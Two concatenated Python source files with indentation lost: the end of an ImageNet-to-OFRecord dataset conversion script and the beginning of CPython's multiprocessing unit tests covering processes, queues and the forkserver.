# output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_filename = 'part-%.5d' % (shard)
output_file = os.path.join(ARGS.output_directory, output_filename)
f = open(output_file, 'wb')
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
index = indexs[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception:
print('SKIPPED: unable to process %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label, index,
synset, human, bbox,
height, width)
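# OFRecord framing: each record is an 8-byte native-endian length
# followed by the serialized example proto.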
l = example.ByteSize()
f.write(struct.pack("q", l))
f.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
f.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, indexs, humans,
bboxes, num_shards):
"""Process and save list of images as OFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
indexs: list of integers; per-image unique ids stored as data_id
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), ARGS.num_threads + 1).astype(int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (ARGS.num_threads, ranges))
sys.stdout.flush()
# Create a generic utility for converting all image codings.
if ARGS.width <= 0 or ARGS.height <= 0:
coder = ImageCoder()
else:
coder = ImageCoder((ARGS.width, ARGS.height))
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, indexs, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
for t in threads:
t.join()
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering). In this script the integer labels start at 0; an earlier
version started the labels at 1, reserving label 0 as an unused
background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
shuffled_index: list of integers; the shuffled per-image ordering, used
as unique per-image ids (data_id).
"""
print('Determining list of input files and labels from %s.' % data_dir)
with open(labels_file, 'r') as f:
challenge_synsets = [l.strip() for l in f.readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 0  # used to be 1; label indices start at 0 in this version
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
if not os.path.exists(os.path.join(data_dir, synset)):
continue
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = glob.glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved OFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels, shuffled_index
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a OFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels, indexs = _find_image_files(directory, ARGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels, indexs,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
with open(imagenet_metadata_file, 'r') as f:
lines = f.readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
with open(bounding_box_file, 'r') as f:
lines = f.readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main():
assert not ARGS.shards % ARGS.num_threads, (
'ARGS.shards must be divisible by ARGS.num_threads')
print('Saving results to %s' % ARGS.output_directory)
if not os.path.exists(ARGS.output_directory):
os.makedirs(ARGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(ARGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(ARGS.bounding_box_file)
# Run it!
if ARGS.name == 'validation':
_process_dataset('validation', ARGS.validation_directory,
ARGS.shards, synset_to_human, image_to_bboxes)
else:
_process_dataset('train', ARGS.train_directory, ARGS.shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the support function can be reused.
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
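# Note: a negative timeout is treated as "wait forever" (timeout=None).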
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except Exception:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# This test is only meaningful for the forkserver start method.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
